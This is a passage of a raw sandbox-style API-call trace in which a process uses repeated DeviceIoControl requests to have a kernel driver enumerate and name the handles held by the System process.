Object=0xfffff880053c8548*=0xfffffa8002e664a0, HandleInformation=0x0) returned 0x0 [0240.454] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.454] PsReleaseProcessExitSynchronization () returned 0x2 [0240.454] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.454] ObQueryNameString (in: Object=0xfffffa8002e664a0, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.454] ObfDereferenceObject (Object=0xfffffa8002e664a0) returned 0x1 [0240.454] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.454] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.455] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.455] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0240.455] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.455] PsAcquireProcessExitSynchronization () returned 0x0 [0240.455] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.455] ObReferenceObjectByHandle (in: Handle=0xffffffff80000410, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e68c70, HandleInformation=0x0) returned 0x0 [0240.455] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.455] PsReleaseProcessExitSynchronization () returned 0x2 [0240.455] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.455] ObQueryNameString (in: Object=0xfffffa8002e68c70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.455] ObfDereferenceObject (Object=0xfffffa8002e68c70) returned 0x1 [0240.455] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.455] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.455] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.455] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0240.456] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.456] PsAcquireProcessExitSynchronization () returned 0x0 [0240.456] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.456] ObReferenceObjectByHandle (in: Handle=0xffffffff80000414, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e653e0, HandleInformation=0x0) returned 0x0 [0240.456] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.456] PsReleaseProcessExitSynchronization () returned 0x2 [0240.456] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.456] ObQueryNameString (in: Object=0xfffffa8002e653e0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.698] ObfDereferenceObject (Object=0xfffffa8002e653e0) returned 0x2 [0240.698] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.698] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.698] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.699] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x16c, lpOverlapped=0x0) returned 1 [0240.699] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.699] PsAcquireProcessExitSynchronization () returned 0x0 [0240.699] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.699] ObReferenceObjectByHandle (in: Handle=0xffffffff80000418, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e68470, HandleInformation=0x0) returned 0x0 [0240.699] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.699] PsReleaseProcessExitSynchronization () returned 0x2 [0240.699] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.699] ObQueryNameString (in: Object=0xfffffa8002e68470, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.699] ObfDereferenceObject (Object=0xfffffa8002e68470) returned 0x2 [0240.699] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.699] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.699] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.700] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.700] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.700] PsAcquireProcessExitSynchronization () returned 0x0 [0240.700] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.700] ObReferenceObjectByHandle (in: Handle=0xffffffff80000420, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003908dc0, HandleInformation=0x0) returned 0x0 [0240.700] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.700] PsReleaseProcessExitSynchronization () returned 0x2 [0240.700] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.700] ObQueryNameString (in: Object=0xfffffa8003908dc0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.700] ObfDereferenceObject (Object=0xfffffa8003908dc0) returned 0x1 [0240.700] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.700] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.700] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.701] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.701] PsAcquireProcessExitSynchronization () returned 0x0 [0240.701] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.701] ObReferenceObjectByHandle (in: Handle=0xffffffff80000424, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028d6070, HandleInformation=0x0) returned 0x0 [0240.701] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.701] PsReleaseProcessExitSynchronization () returned 0x2 [0240.701] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.701] ObQueryNameString (in: Object=0xfffffa80028d6070, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.701] ObfDereferenceObject (Object=0xfffffa80028d6070) returned 0x2 [0240.701] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.701] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.701] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.701] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.701] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.701] PsAcquireProcessExitSynchronization () returned 0x0 [0240.701] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.701] ObReferenceObjectByHandle (in: Handle=0xffffffff80000430, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f85860, HandleInformation=0x0) returned 0x0 [0240.701] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.702] PsReleaseProcessExitSynchronization () returned 0x2 [0240.702] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.702] ObQueryNameString (in: Object=0xfffffa8001f85860, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.702] ObfDereferenceObject (Object=0xfffffa8001f85860) returned 0x2 [0240.702] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.702] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.702] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.702] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.702] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.702] PsAcquireProcessExitSynchronization () returned 0x0 [0240.702] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.702] ObReferenceObjectByHandle (in: Handle=0xffffffff800004a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003773500, HandleInformation=0x0) returned 0x0 [0240.702] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.702] PsReleaseProcessExitSynchronization () returned 0x2 [0240.702] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.702] ObQueryNameString (in: Object=0xfffffa8003773500, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.702] ObfDereferenceObject (Object=0xfffffa8003773500) returned 0x1 [0240.702] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.702] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.702] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.702] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.702] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.702] PsAcquireProcessExitSynchronization () returned 0x0 [0240.703] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.703] ObReferenceObjectByHandle (in: Handle=0xffffffff800004b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800371d490, HandleInformation=0x0) returned 0x0 [0240.703] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.703] PsReleaseProcessExitSynchronization () returned 0x2 [0240.703] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.703] ObQueryNameString (in: Object=0xfffffa800371d490, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.703] ObfDereferenceObject (Object=0xfffffa800371d490) returned 0x1 [0240.703] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.703] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.703] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.703] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0240.703] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.703] PsAcquireProcessExitSynchronization () returned 0x0 [0240.703] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.703] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a1df20, HandleInformation=0x0) returned 0x0 [0240.703] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.703] PsReleaseProcessExitSynchronization () returned 0x2 [0240.703] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.703] ObQueryNameString (in: Object=0xfffffa8003a1df20, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.703] ObfDereferenceObject (Object=0xfffffa8003a1df20) returned 0x2 [0240.703] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.704] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.704] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.704] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x2e, lpOverlapped=0x0) returned 1 [0240.704] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.704] PsAcquireProcessExitSynchronization () returned 0x0 [0240.704] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.704] ObReferenceObjectByHandle (in: Handle=0xffffffff800004e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800e3fb5b0, HandleInformation=0x0) returned 0x0 [0240.704] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.704] PsReleaseProcessExitSynchronization () returned 0x2 [0240.704] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.704] ObQueryNameString (in: Object=0xfffffa800e3fb5b0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.704] ObfDereferenceObject (Object=0xfffffa800e3fb5b0) returned 0x2 [0240.704] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.704] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.704] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.704] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.704] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.704] PsAcquireProcessExitSynchronization () returned 0x0 [0240.704] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.704] ObReferenceObjectByHandle (in: Handle=0xffffffff800004ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800a8713a0, HandleInformation=0x0) returned 0x0 [0240.704] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.704] PsReleaseProcessExitSynchronization () returned 0x2 [0240.705] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.705] ObQueryNameString (in: Object=0xfffffa800a8713a0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.705] ObfDereferenceObject (Object=0xfffffa800a8713a0) returned 0x2 [0240.705] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.705] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.705] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.705] PsAcquireProcessExitSynchronization () returned 0x0 [0240.705] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.705] ObReferenceObjectByHandle (in: Handle=0xffffffff800004f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f7f980, HandleInformation=0x0) returned 0x0 [0240.705] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.705] PsReleaseProcessExitSynchronization () returned 0x2 [0240.705] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.705] ObQueryNameString (in: Object=0xfffffa8001f7f980, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.705] ObfDereferenceObject (Object=0xfffffa8001f7f980) returned 0x2 [0240.705] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.705] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.705] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.705] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.706] PsAcquireProcessExitSynchronization () returned 0x0 [0240.706] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.706] ObReferenceObjectByHandle (in: Handle=0xffffffff800004fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a6aa10, HandleInformation=0x0) returned 0x0 [0240.706] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.706] PsReleaseProcessExitSynchronization () returned 0x2 [0240.706] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.706] ObQueryNameString (in: Object=0xfffffa8003a6aa10, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.706] ObfDereferenceObject (Object=0xfffffa8003a6aa10) returned 0x2 [0240.706] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.706] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.706] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.706] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.707] PsAcquireProcessExitSynchronization () returned 0x0 [0240.707] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.707] ObReferenceObjectByHandle (in: Handle=0xffffffff80000500, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8009bbc9d0, HandleInformation=0x0) returned 0x0 [0240.707] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.707] PsReleaseProcessExitSynchronization () returned 0x2 [0240.707] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.707] ObQueryNameString (in: Object=0xfffffa8009bbc9d0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.707] ObfDereferenceObject (Object=0xfffffa8009bbc9d0) returned 0x2 [0240.707] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.707] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.707] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.707] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.707] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.707] PsAcquireProcessExitSynchronization () returned 0x0 [0240.707] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.707] ObReferenceObjectByHandle (in: Handle=0xffffffff80000504, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a75d50, HandleInformation=0x0) returned 0x0 [0240.707] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.707] PsReleaseProcessExitSynchronization () returned 0x2 [0240.707] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.707] 